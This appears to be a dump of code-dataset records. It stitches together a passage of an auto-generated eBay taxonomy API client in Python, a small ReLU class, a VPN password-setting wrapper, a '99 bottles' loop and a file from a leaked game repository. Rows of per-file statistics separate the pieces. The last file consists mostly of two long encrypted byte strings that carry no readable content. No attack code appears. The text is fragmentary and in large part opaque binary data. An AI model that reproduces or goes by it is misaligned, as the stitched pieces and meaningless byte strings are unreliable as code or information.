raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_default_category_tree_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'marketplace_id' is set
if ('marketplace_id' not in params or
params['marketplace_id'] is None):
raise ValueError("Missing the required parameter `marketplace_id` when calling `get_default_category_tree_id`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'marketplace_id' in params:
query_params.append(('marketplace_id', params['marketplace_id'])) # noqa: E501
header_params = {}
if 'accept_language' in params:
header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/get_default_category_tree_id', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BaseCategoryTree', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_item_aspects_for_category(self, category_id, category_tree_id, **kwargs): # noqa: E501
"""get_item_aspects_for_category # noqa: E501
This call returns a list of aspects that are appropriate or necessary for accurately describing items in the specified leaf category. Each aspect identifies an item attribute (for example, color) for which the seller will be required or encouraged to provide a value (or variation values) when offering an item in that category on eBay. For each aspect, getItemAspectsForCategory provides complete metadata, including: The aspect's data type, format, and entry mode Whether the aspect is required in listings Whether the aspect can be used for item variations Whether the aspect accepts multiple values for an item Allowed values for the aspect Use this information to construct an interface through which sellers can enter or select the appropriate values for their items or item variations. Once you collect those values, include them as product aspects when creating inventory items using the Inventory API. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_item_aspects_for_category(category_id, category_tree_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_id: The unique identifier of the leaf category for which aspects are being requested. Note: If the category_id submitted does not identify a leaf node of the tree, this call returns an error. (required)
:param str category_tree_id: The unique identifier of the eBay category tree from which the specified category's aspects are being requested. (required)
:return: AspectMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_item_aspects_for_category_with_http_info(category_id, category_tree_id, **kwargs) # noqa: E501
else:
(data) = self.get_item_aspects_for_category_with_http_info(category_id, category_tree_id, **kwargs) # noqa: E501
return data
def get_item_aspects_for_category_with_http_info(self, category_id, category_tree_id, **kwargs): # noqa: E501
"""get_item_aspects_for_category # noqa: E501
This call returns a list of aspects that are appropriate or necessary for accurately describing items in the specified leaf category. Each aspect identifies an item attribute (for example, color) for which the seller will be required or encouraged to provide a value (or variation values) when offering an item in that category on eBay. For each aspect, getItemAspectsForCategory provides complete metadata, including: The aspect's data type, format, and entry mode Whether the aspect is required in listings Whether the aspect can be used for item variations Whether the aspect accepts multiple values for an item Allowed values for the aspect Use this information to construct an interface through which sellers can enter or select the appropriate values for their items or item variations. Once you collect those values, include them as product aspects when creating inventory items using the Inventory API. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_item_aspects_for_category_with_http_info(category_id, category_tree_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_id: The unique identifier of the leaf category for which aspects are being requested. Note: If the category_id submitted does not identify a leaf node of the tree, this call returns an error. (required)
:param str category_tree_id: The unique identifier of the eBay category tree from which the specified category's aspects are being requested. (required)
:return: AspectMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['category_id', 'category_tree_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_item_aspects_for_category" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'category_id' is set
if ('category_id' not in params or
params['category_id'] is None):
raise ValueError("Missing the required parameter `category_id` when calling `get_item_aspects_for_category`") # noqa: E501
# verify the required parameter 'category_tree_id' is set
if ('category_tree_id' not in params or
params['category_tree_id'] is None):
raise ValueError("Missing the required parameter `category_tree_id` when calling `get_item_aspects_for_category`") # noqa: E501
collection_formats = {}
path_params = {}
if 'category_tree_id' in params:
path_params['category_tree_id'] = params['category_tree_id'] # noqa: E501
query_params = []
if 'category_id' in params:
query_params.append(('category_id', params['category_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_auth'] # noqa: E501
return self.api_client.call_api(
'/category_tree/{category_tree_id}/get_item_aspects_for_category', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AspectMetadata', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 70.332941
| 1,106
| 0.709014
| 7,945
| 59,783
| 5.165009
| 0.05752
| 0.059363
| 0.050492
| 0.014036
| 0.963617
| 0.956477
| 0.950848
| 0.945755
| 0.939687
| 0.938128
| 0
| 0.011919
| 0.228125
| 59,783
| 849
| 1,107
| 70.415783
| 0.877365
| 0.588495
| 0
| 0.766885
| 0
| 0
| 0.232311
| 0.075449
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.008715
| 0
| 0.100218
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e503a17ace2028d5b1adc68dafbf82a4b9ec2b54
| 166
|
py
|
Python
|
app/pytorch/book/chp004/e1/relu.py
|
yt7589/aqp
|
c9c1c79facdea7ace73e2421e8a5868d87fb58dd
|
[
"Apache-2.0"
] | null | null | null |
app/pytorch/book/chp004/e1/relu.py
|
yt7589/aqp
|
c9c1c79facdea7ace73e2421e8a5868d87fb58dd
|
[
"Apache-2.0"
] | null | null | null |
app/pytorch/book/chp004/e1/relu.py
|
yt7589/aqp
|
c9c1c79facdea7ace73e2421e8a5868d87fb58dd
|
[
"Apache-2.0"
] | null | null | null |
#
import numpy as np
class ReLU():
def __call__(self, x):
return np.where(x >= 0, x, 0)
def gradient(self, x):
return np.where(x >= 0, 1, 0)
| 18.444444
| 37
| 0.542169
| 28
| 166
| 3.071429
| 0.535714
| 0.069767
| 0.255814
| 0.302326
| 0.465116
| 0.465116
| 0.465116
| 0
| 0
| 0
| 0
| 0.043103
| 0.301205
| 166
| 9
| 38
| 18.444444
| 0.698276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
e548c59d4516a08c058bc6f39230da5c2499bbac
| 247
|
py
|
Python
|
SevpnMgmtPy/admin_api/rpc_set_password.py
|
relman/sevpn-mgmt-py
|
e54ef834b2a35bb85f72d72b9ccbc065f2e5a92c
|
[
"MIT"
] | null | null | null |
SevpnMgmtPy/admin_api/rpc_set_password.py
|
relman/sevpn-mgmt-py
|
e54ef834b2a35bb85f72d72b9ccbc065f2e5a92c
|
[
"MIT"
] | null | null | null |
SevpnMgmtPy/admin_api/rpc_set_password.py
|
relman/sevpn-mgmt-py
|
e54ef834b2a35bb85f72d72b9ccbc065f2e5a92c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
class RpcSetPassword:
def __init__(self, hashed_password):
self.hashed_password = hashed_password
def out_rpc_set_password(self, pack):
pack.add_value("HashedPassword", self.hashed_password)
| 30.875
| 63
| 0.688259
| 29
| 247
| 5.448276
| 0.586207
| 0.35443
| 0.341772
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005076
| 0.202429
| 247
| 7
| 64
| 35.285714
| 0.796954
| 0.08502
| 0
| 0
| 0
| 0
| 0.064516
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 1
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
e55ee93b759bf471821a57ae05adae6e388f6aa4
| 447
|
py
|
Python
|
99bottles/99bottles.py
|
kevinnls/python
|
ecd483e4666da9afe84662210751f2e3d8d94d16
|
[
"MIT"
] | null | null | null |
99bottles/99bottles.py
|
kevinnls/python
|
ecd483e4666da9afe84662210751f2e3d8d94d16
|
[
"MIT"
] | null | null | null |
99bottles/99bottles.py
|
kevinnls/python
|
ecd483e4666da9afe84662210751f2e3d8d94d16
|
[
"MIT"
] | null | null | null |
n = 9
while n>=1:
if(n>1):
print(str(n) + " bottles of beer on the wall, " + str(n) + " bottles of beer.")
n-=1
print("take one down and pass it around, " + str(n) + " bottles of beer on the wall.\n\n")
else:
print(str(n) + " bottles of beer on the wall, " + str(n) + " bottle of beer.")
n-=1
print("take one down and pass it around, there are no bottles of beer on the wall.\n\n")
pass
| 37.25
| 98
| 0.545861
| 79
| 447
| 3.088608
| 0.316456
| 0.147541
| 0.266393
| 0.213115
| 0.848361
| 0.819672
| 0.819672
| 0.819672
| 0.606557
| 0.606557
| 0
| 0.016181
| 0.308725
| 447
| 11
| 99
| 40.636364
| 0.773463
| 0
| 0
| 0.181818
| 0
| 0.090909
| 0.534676
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.272727
| 0
| 0
| 0
| 0.363636
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
e596d5f6e41810bb94d357c9d7b4daee50707088
| 441,050
|
py
|
Python
|
v1.0.0.test/niraidata.py
|
TTOFFLINE-LEAK/ttoffline
|
bb0e91704a755d34983e94288d50288e46b68380
|
[
"MIT"
] | 4
|
2019-07-01T15:46:43.000Z
|
2021-07-23T16:26:48.000Z
|
v1.0.0.test/niraidata.py
|
TTOFFLINE-LEAK/ttoffline
|
bb0e91704a755d34983e94288d50288e46b68380
|
[
"MIT"
] | 1
|
2019-06-29T03:40:05.000Z
|
2021-06-13T01:15:16.000Z
|
v1.0.0.test/niraidata.py
|
TTOFFLINE-LEAK/ttoffline
|
bb0e91704a755d34983e94288d50288e46b68380
|
[
"MIT"
] | 4
|
2019-07-28T21:18:46.000Z
|
2021-02-25T06:37:25.000Z
|
CONFIGFILE = '\xc1A\x1a{\xb4\xaenu7h;\x15\xbe\xdf\xed}\xbd\xfe\xbeM!\x0c\xea\xe0\x06C\xe21\xa9\x8e\x05+\x04\x06\xb4b\x81f\r\xa9\'\xa3\xfa\x10\x87;\x19\xf3\x01K\xf2\x03\xbb\xa8~\xc1\xc7!\xec%\x88\xb9\xdc\xad\x04%di5\x15+\x8d\xf77\x7f\xe2T\xc0\xa0+ZIQ3\xd1`K\xe8\x86\x97]\x90\xe2gt-\xdd)\xcb\xd9$\x1bo\x95\xb0\x00l\xfd\xe6\x8f\x9b\x04\xd5Y\nb\xd7\x1e\x17\xb9\xa4\x99#(\xa1\xf7[\x00\xcb\xd8\x05#\x8b\xf2c[{\xaa\xc4\xd4\x94o\x9a\x82h\x16D\xfeX"*\x96\xf9\xa5%?8Z\x86O\xdbK\xba\x1f/i\xcd\xd3\xaa:\xc1\x14\xd3V\xb9\x90<\x01(=\x18\xe9\xee\t\x06\xebB\xf8P:&\x13\xdb\x92a\xf4\xe9\xd9\x83\x95\x02\x1e \x06:\xbf\xc3\xc8\xcd\xea\x18\xc7\xe8\r=Hv\xe6(\x0f]\xf1JF\xa1a\x95\xdd\'\xd7\xd0\xcdP$\xd0\xc0ep\xa7\xf8\xa8\x16M\x91\xceA\xaa\xe8\x1c\x0f\x93_\x84\xe1\xbd\xa7:\x84*\xee\x9e\x00\x9dQ\\6\x02&\xeaabc\xa9\x98;\xed\xf1\xe4\x9b\xfe\x0ec\xc6\xf5\xd9\xc2\xdd|YP\xbd\x02\xde\xe3Y$\xbb\x0eh\x1eV\x1e\x99_G\x03\x9ej,\x06\xab\x02\x9a\xc0\xf5\xd1\x0es\xe2\x9b\xe4\x13\xdb,\xcf\xbaT\xac4\x95\x86>>\x92>\xd1\x82\xb9V\x93G\x1aJ\xedb\xca\xc25\xf3\xa2G\xa5 ]qB\xf0\xb0prx\xf9\x17\xbe%\xdf\xb6\xc4|{\xd6\xe4Bi)o\xf3#X]Z\xb4\xde\xb2\xa4\xa8\x86f\xa5\xf9\x93\xd6\x06\x02\x03 \xa8\xec\xbf"\xe0]s\x1a\xc4D\xa8\x1d\xc1\x80\x06I\x13\xd4\x8d\xc6\xe1X\x7f]\x14\xed\xb4h\x7f\xb2$\xbd1G\x17\x0c\x7f\xceq\xc0\xe9\xec\xef\x1d\x0b\xb6\xb0N\xcfT\x1f\x92Wdj\x04\x11\xa5\xeeE#\xbe\x0f\xd3\xd8S\xc7\x17\xf5\x11\xdd\xb5;\xb4`\x02Rn\xc2\xf0P\x86\xca+h\xbd[\xc5H\x9f\x9a\xa1\x96*\xb7\xd1\xa9\xe7\x1b\xc7\xda\x1f\xcd\x90=<\xa8\xee\x81\x88\xb6\xac*Gh\xc3\x84\xf02\xa5g\x87\x0b\x02\x83\x97ru\xc1\xfd\xe8\xf6\x9cb\xa6R\\+&\xc9!\x11N\xb8(S\xa2\xdaqX\x06\xf4\xfe\x006\x8a\x8a\xaa\xe1\xa8x\xac\xf9\x8c]j\xcc\x8bU\xa6<\xe1+d\xf6\x19\xe4\x96\x91\xd3?\xf6\x8e\xb1\xd7!yg\xab\x16\x05\xd9\xa4\xf7\x93Nu\xad=\xe6;\x91\x8eC\x8b\x89$lw\xd4\xf6;\xcf\xa6\x1aL\x1a\x9aE\xf5\xf6\xd0\x8ef\xd9\xda\xbdyQv\xb5ly\xa1]\x19\x1b\xa1\x16\x10\x1315\xfb]\xe9\xea3\'Y\x11\x92\xbb+$\xd2\\\xa1/\xbb\x86W\xfa\xde$\xc7\xe2db8\xcd\xf2}Q+c\x96@`\xba\x92;D\x14\xa8\x85\x855A\x1cL\xd5\xd0\x9fD|\xf4,GA\x96\xee\xa8\xdeT\x80\x889\xea\xd7\x8b\xb2\xef\x8d\xe2\x038EM\xa6\xd4\xa1r#Q\x0c\xc4xR\xd2\xa6\xde\x19\xf3\xc2\x8d\x1d\xf1h\x8fFHOkI\xa3\xbc\xce\xbe.\x921\xf9\xf2=o\xb2\xe7\x88\x1a\xec \xbcg\xcb\xc6\xf2\xa8z\x16{(8\xd1~yU:\xc2\x01\xa0Z\xde\xbc\x13c\x83\x0c\xb1\xd3\x8b\xb1\xfa#is&^S\x9e}\xc2\x1c\x1d\xb9\xef\x03\x90b\xc4\x17.#\xa1\xe4\xd1\xd1\xe6\xc8\t\xee\x93\xc9~\xf67\x14\xaa\x8e\x19\x9c\x1e\xac\xbdbEO\x97A\x9d8N\x92F\xb6emDo~\xad.\xe6\xf4\xcf\xecl\xac2\x1c\xd4\xab,u\t\xc4\xe6\x96u\xc4\x0f7\xc5\xe4\x92\x01\x06\x8c93 $\x9a\x85\x15\x9d<\x03\x14:\x1c\xaf\x82B\xe8I\x0b\x93\x96\xc0?\x13T\x9a\xec\xbe\xcc_KS\x9fA@\xa9l\x82nc\xc9!.T\x13\x04a\xca\\\x0c\x8a\x91N\xcc\xb4\xf4\xbe\x85ZoY\x84\x9b\x135\x89\xfc\xdf\x91\xf1\xb3g\x8d\xcf\xe6\xf2\xf9[\xf2\xd0\xde\x13\xc3T\xee/\xb4~\xe0\xb2G\x9du\xbf\xb8%sf\xd6\xfeG\xe24\x84\x88\xbd\xb2I\x18Dy\x02\xa6\xef\xac\x1ao+\xc3\xc309r\xf2\xbd\xfe<\r\xd2\xf2~\xfd\xb8-\x9f1\x8e\xe9\x10\xe6S\xb1\x15\xf3\xbfR\xd5\xe1\xcc\x9d\xb6\x90\xc4b)qj\xe7B\x97\xdc\xa3\xb4\xf7}\xdejT\x10\xcd\x119\x96\xb0\xd8\x1cQ\x85\x1e\xbc\xb8d\x12$U\x1e\xd0(>\xee>\\\x05\xf4!\xc4\x99\x05{\xef\xfd\x81\xa1\x83\xaa\xda\x0b4?Z\xbf&\x9bZ\x8e\x98\xbc\xe9\x89\xda\xb2\x97*{j\xf0\xda\xb89j\x12\x8c\xdaa\x03\x89F%\x8a7\xf7n\xd5\xdc#XN\xa9\x9f(\x04\\\xc4\x9c\xa4\xdf\xcd\x1ffH\xc9\r\x0c*\xa6\x8d\xb8\xfc@_6\xeb4c\xfc\xa3]K\x19\\\x04\xe8H\xac\xd2)\xd0@y\xb7\r0k\xb8\xbc\x96P^\xc7\x9f\xb9q\xf3\xbf:]\x01D\xfb|\xf4zrc\xa9|<#|\xcc\xf1\x81Hr\xe3\x97\x11\xf8\xac,\xdbVw\xe50\xf3\x05\nu\x17ln\xa7\xef\x07\xb9-\r\xef<\x87\x907\x88\xdchTV\x9e\xee\r%\xee^V\xb0F\tB3OIf\x8f\xafx\x9f\xfbB\xbd\x98\xc0\xd4\x98\x8c\xa7\x8aiz\x07\x86\xe5\xa1O2^!TW\x8a\xd8\xef\xad\x99\x99Y/\xb2\xa9\xba\xda\xba\xff\x99\xdb\x0e\xe5\xa5\xb4*\xaeI\x13\xfb\xa7z\xa3Kr\xe5\xe6\\\x89+(\x1bX\xbcK IW\xec\xaa\x1e\xd5\xb4$\x1e2J9\xba\xdc\xcc\x0c\xd8`r\xd1+\xff\x83\xdcY\x0e\xf6u@\xae}\x8d\\!\x13s\t\x88\xb3\x8d\xd9ZAF\x90\x12(\xf5l\x97\xfa\x8b=\x18\x7f\xf5\xe8\x1d3\xbc\x18"\xd3\xc9!C\xb4\xb6\x93V`\x92\n\xbe\xff\x979f\xcc\xa5\xa9\xa9H-!\x1a\xcds\xa6\xc8\x8a@\x07\xf4}\xe4\x8b\x99}\x95Y6\xb0\xe1W:\xc8\x87\xde\x18_X\x89\x84\x9f\xef\xab\xdb\x8e:\xf9\xeeI?p\tQ\xcd\xb4\x02\x1f\xcc\xdb\x1a\x82\xbf\x90\xf4\x01\xa7\x93Ck<\xf0S\xc8d\x9f\xa5ckf[\'/T\xee\xa1\xc1O\x15\x8b\x91\xca\x03\x89=c6\x97Z\xce<;u\n\xd9\x0b^\xf4\xb8tw\x08r\x88\x99\x8e\xf1\x87eM\xd3b\xdb\'\xe2\xcd\xf6|\x1c\xb3C\xad\x85\x05\x9dB*\x8d\xa3\x16\xd2\r\xd1\xaf\x9b\xe0;:m~\x02Zk\n\xca\xb4\'\xd1\xe9L\xd2\xe9>{\x81\xe7\x1d\xe8\x83\x96\x1e\x81\xa3cD\x9cb\x92@\xafm\xb1b\xe1\xe3P\x92$\x0f\x9a\xa7V\xb7\xc9\x86\xc81\xb0\x06\x83\xed/Ir?\x86\x8d[\xe5\xb7\x9a\xea\xfe\xd5\x80\x84\xb2-\xe3U\xff\xc5\xcf\x1b\xe0\xaa\x1b\x0e\x95\xbd\xd5D\x88\xa0"\xd9\xb8\x84\xe9:O\xb5x\x9eq4\xd0\xf4J\xe2MY\n\xffm\xfa\xd4-\xfc(\x97\x92\\\xecG\x92\x9e\xd3N\x801\xf5\xacP\x1d\xfc\x112Y\xe1\xa8\xdd\xfc\xc0y\xdbX\xfa;A]`c\xd7\x82\x11\xe4\xa7\x08\xb7f("&\x17j\x8c_a\x03:\xac\xed$\r\xb8h\xb8\tM\x80\x87\xfbq\xbf\x86\xf1\x98,?a=\xb9`\xd3pS:oZ_\x0b\xc8\x15\xbb\xe2\xa6\xa0G\xfa\x90\x1f\xe2\xc9\x9d\xc2\xf8\x9a\xcc\xf8S\xbd\x1bP\tL~\xe2\xdf\x85\x01\xc71\x16w\x1e\xfc\x90\xfcW\xb1q\xab\x0e\xf3\x97gU\xcb'
DCFILE = '\xa9Qy(c\xed^\x82\xcb\x82\xd1\x9d\xab\xb8\xd1s-\xc5\xcd\x8cSO\x14:\x87\xb1\xbc\x89\xb8\xe8\xaaP\x9b*\xfb\x1e\xec\x82\x10*\xa1i!\x82\x1c\x0b\xaa\x03 Cc\xfc\xbdw\x9a\xcaR!\x92\xc2\x9f\x94\xa4\xc01\x82\xf5\xde\x88x\xfc\xd5M\xefn\x9f\x9d\xbeM\xc3\xee\xf3L\xd2\x99\x1e\x1b|\xad\xe5\x9e:5w{H=\x13\xf8\x1b/Bu\xc8\x06\xf2\x9f\x9a\xc0\xc5\x81>O\x91W\x8d\x0c\xe17b4\x9f\\\xa5\xb6\x19\xe1\xb9\xb9\xc6\r<\x84\xd2>\nH\x87\x92\xc6<99\xf9\x10\xd6E\x9c\x10\xc2\xbb\xc30\xd8\x81\xc3\xd8:\x15e\xf1B:\xd40\xc2jB\xc2]R\xfc^\xcc\xd5\x9be-\xc1\xe9b\x01\x8c\x99\xab\xceN\xf5\xab[wp{\x01\x99\xa2\xd1\xb1\xa7Y\x9c\xe0\x7f\xb4\xbfb\xc0\'j?\xe7\xf6\x86\x16?3v\xadf\x95\x9ai\xd8\xd9lyB\xe6tg\x99p\xa6\x919\x98\xa0m`&.\x9b\x8a\x98\x85\'t8\xf9\x98\xa3\x0f\xd3x#\xe5L\x9e\xfaed\x98d8\xb3h\xca\xc3\xb5\xfae"N\x84\xdc\x99\x01R\x1f\xce\xaf\x8dDyT\xbf\x13\x13c\xd9z\xff\xf1S\xfa\x9dI\x05\xbf%#b\xc3K\xa8\xda\xe5\x96f\xc8\x04\x91o\x17\xa0Y\x17X\r\r>\x10\xe3]\xba8\x19\xb6\x12\xb6\n\x03\xb8\xa2\xa7\xe3\x08\x98xHil\x9f\xa4[\xc6\xb2dI\xb1\xa9\x12kh\x15\x0eUK\xa4\xb5vF$K\x07\x9e{/k\xf0\xb4\x9b\xde/\xd5\\\xd2yo\x12\xefn[_\xdcPZ\x9e\x8c\xed0 \xc2k\xc0\x9e\xae\x8e\xd9w\x0f\xd4\x96m\xf7\x97&?\xf7m\\\x9f\xcf1/5V\xf1\xef}\x95\x9a)\x12\xa0\x9ck\x8b0\x1c\x03\x1b\xe1\xcdI8\x99\xbdk\xaa2\xfa\x1e\xb9\xbe6F\t\x16`\xce\xdelA\xd9\'\xb1\xa8\x12\xbf\xf7fsr\\\x9c\xef\xed\xd6\n\xacm\xc6\n(\xbf\x02\xec4V\x00\x03\xa3>\xa6\x04\xff\xd7\t^\xcac|\xc7\x80\xa3oT\x0eA\xc8\xf1z1`\xc7Z\x87\xdc(F0\x95\xbe\xeb\xc3\x99\x8f\xf7.\xf2\xbd\xdb\xed\xb6\xcdV\xab\x17\x05h\xc6\x07\x11\xa9x\x1b>kn0\x03\xdf\xda\xd0`j\xb7\xf4^\xb0\xfd\xbcd0gp\xe55\xabK4\x89\xda5\xf3\xf0\xdfb\xde\x90z\x06(\x0c\xf0Oo\x9c\xbcx\xa5\x96\x0b{\x90s\x12\xdd;\x06E\x11(Av%\xc8\xcb\xd3\xfd\x8a!\xbdQ;x\xdd\x93c\x1d]\x19\x9a\x88\xff\x9c\x02uL\xdc\xaf\xbe\xe1\x9e\x85\x83~z\x00?\xe4\x9cK\\\xab=\x06u\x12x\x94\xa7\x8a\n\x87\x06\x08\x8b\x84B\xfb_\xd7tO\xd1\x97g\x9a\x00\x0f05|\xc1\xab\x0c\xa0v.\xbb\x0c\xd2\xc75Fs\xedu\xc4\xb4\xd8:N\xb3\xfbo)\xf7\xfd.\x8a\x94A"B\xac\x1c;\x8c?2\xfd$\xf6\x88d\x04\xdd\xb71"\xf4\xed\n\xa1e1\xc9\x89s\'M\x82\xa0\xd0\xa2\x08\xe3A`/\xcff\xfex\x10V\xff\x98\xb0>\x01\x91N\xc9\x12?et\xd3\xe17\xf8\xe8\x17c\xd3 \xe7\xbc\x96\xe0\xec\x8e\xe7W\xfb\x8c\xc0K\x17\x981f\'s\xb3\xcb$g\'\xa4D4&\xa7\xa8;\x10\x07\xd8\x11\x93 \x87V\x99\xd8zm\xe7!\xd6\xc1h\x1f\x8d\xae\xb7\x14$`N\x10\x94z\xa0\n\xf7\x06\x92\x00\xf3Dw6>>\xb2\xf7\xff\xbc\xb2\x99\x94\x89\x7f\x85\xb7\x885\x8fe\x85\x1e\x80\x99\xe2mT;eA\xa9\xc3\xea\xa3\x18\xf7|^M\x1a\xddo\xca\r\xc8\x97\x1c\x91q\x7f\x8ey7\x85\xab1xB\t\'\xe5D\xb8 \xe2*\xca-+\xbb\x19\x0e\x9d9+]\x01i\x10VH3\xb7\xe3/\xede\x8f?\x9c\x10\x96?\xce\xeb\xec?\xa3\x94\ri\xc9\xc2\xa4\x8b\x00F\xc8\x97C\x836\xcf\xf1b/\x1b\x8dj\x84\x9d\xb8q\x93\xc8\xe8~5\n\xe9\xc1\x9f\xcejxx@\xd6|u\x8e,\xaeHf~z\xce\x19\xc9\xba\xd2\xb4\xe1\xd4NA\xfc\x06\xf1\xe5\x80\xf1\x15|\xd4\x8e\xff\x04\xeb\xe2c\xb7#\xa9\xdb\xbcI \xe4\x9e\x94\xbb\xc15\xeen\xc9\x0b\x1c\xe1\x17\x0f\xe9\x1b0\xf4\tA\x89\x84d\xd5\x8e\xed\x1a\xc3\xa4~\xd9\x1b\xeb\xfc+\x11\x8b\xe9j\xcc\xc8\x82\xac)\x8a\xfc\x18\x9c;\xcd\x13E\x1c,\x1b\xb2\xca\xcf\x0b\nq\xc9\xb5\xe7\\\x06\xec\x84\xdf\xfe\xc5t\xa5+\x04\xe9\xf3\xdc2{\x89\xa7\xd4\x16F\x8d\xb9\x95\xef\xd4Dw%\x07\xbf\x99O\xa9\x1b\xb1?\xee\x7f69\x957\x00B\x9c\xb0aGK\xeaxO[\x00F\x91\x066\xa4\xa0\xd1\xd5\xad\xd5\'\xd1\x0b\x83\xf3\x83\xf9H\x89H|\x0f\xc8^B\x07\x9f\x02\xf7\x19\x9ef7\x16\xfd\xd0b\x9a\x88\xc7\xf2\x16\xbaL8=\x15\x01\xfcqmf\x15\x1dq\xab\x7f\x84\x88\xd6V\xc2C\x04R\xb0O\\\xe2C\x91\xc99."\xe3\xa6\xab\x03.\x8bDd;\xa09\xa3\xc3\x96\\_.\x1b(\x16\xdaN\x85\xf1\xfb\x92P_\xecT\xaa&t\xbavT\xda(/%\xb1\x7f\xbd\xaf)\x16`,u\x03\xef1?Rzr\x14\xf2\xa7\xb5\xfc\xff\xfd\x13\x0b?1\x87z4\xd5\x01\xe5\xbf\xb5\xaasX\xa5d\xfb\xfdGc\x1f\xa1\x1b8\xdc8A\xafR\xcdA\xddgl\xc8\x90f\x8b\x1cE\xeea\x84\x08A\x113\xba\xf5O\x96\x9f\xe5kT\x1e\xb3\xd8\xc0\xdat\x92F\xc2"\x183\xc4.{\x12\x8b?0\x9b\xcb\x83\xbe\xebf\xd9^j\xb4\xa7r\x0cq9{\xf2\x9b\xd0-jt\xa2\xd4\xf0"\xa7ObDj\x95\xfbG\xbd\xe9\xf0Y\xa06)g\xc2\xf5\xb8\\J\x08C\xb7r\xbf1\xcf{\x9dV\x93\xf3\x0b\xe4\xee\x97-n\x87\xbb\xe4\xeb\t\xdd\x9b\xbea\xb9\xa5\x1e\xa3\xd0|%cr\xf0/\xd7c\xaceY|\x87\xd8\x0c@\xa2\xe2pi\x11\xe34\xce\xe9\xadh$0\xcd\x9a\x0c\x96p\x81\xe6g}\xf4\xc9\x93"Z\x9b\x08\x87)wH\x19\xd8\xf2rF\xe6\x97\x88ms5~\x80\x7f\xb4\xff^_\xa8\xbaX\xe4\xeaEn3\x94\xfe\\s\x0f\xf5\x1d\x0e\xff\x9e\xd4`}}\xa1\xe9O\xd66\xfa\xf2\xf0\x97\x06\xa0\xda\x86\xa3\xc4@L\x8e\'N\xfe\xc9J\xfeu-\xd0\xe6\xeda8\x81G_\x08\xf6\x99oz\x94\x8a\x1eK\xc7\\0\x02EQ\x8f\xe9\xdfQ\xfet&\xc4\x98k\xa4,\x86\xd4\x869A/\xb4\x82\xb3\xca\xf9\x9a\x06V\xba\xfd\xb48m\xb2\xe5\xbb\xd4\xdc\xeb\xd8\xbf\xc1\x9f\xbeE\xb60\x01\xa7\x0b\x87\xc7\x14h\xba\x16\x8aP2P\\#\xf9|\x15\xe92K\x92i\xc2\xe9Le\x05ws`j|\x07)\x143\xfc\xfd\x8d\x89XT{E\x0b:@4\xdbN\xac\xab\xeb\xc7pG\x01Z\xd4Gx0\xa2\x0fnM\xa4X\xc6h\x83U\x00{\x83\xa9\x8f\xde\\K2M\x1f\xe9O\x01\x11\xbe\xf8\x88\xec\x0f\x9b\xc6\xf0y\xd0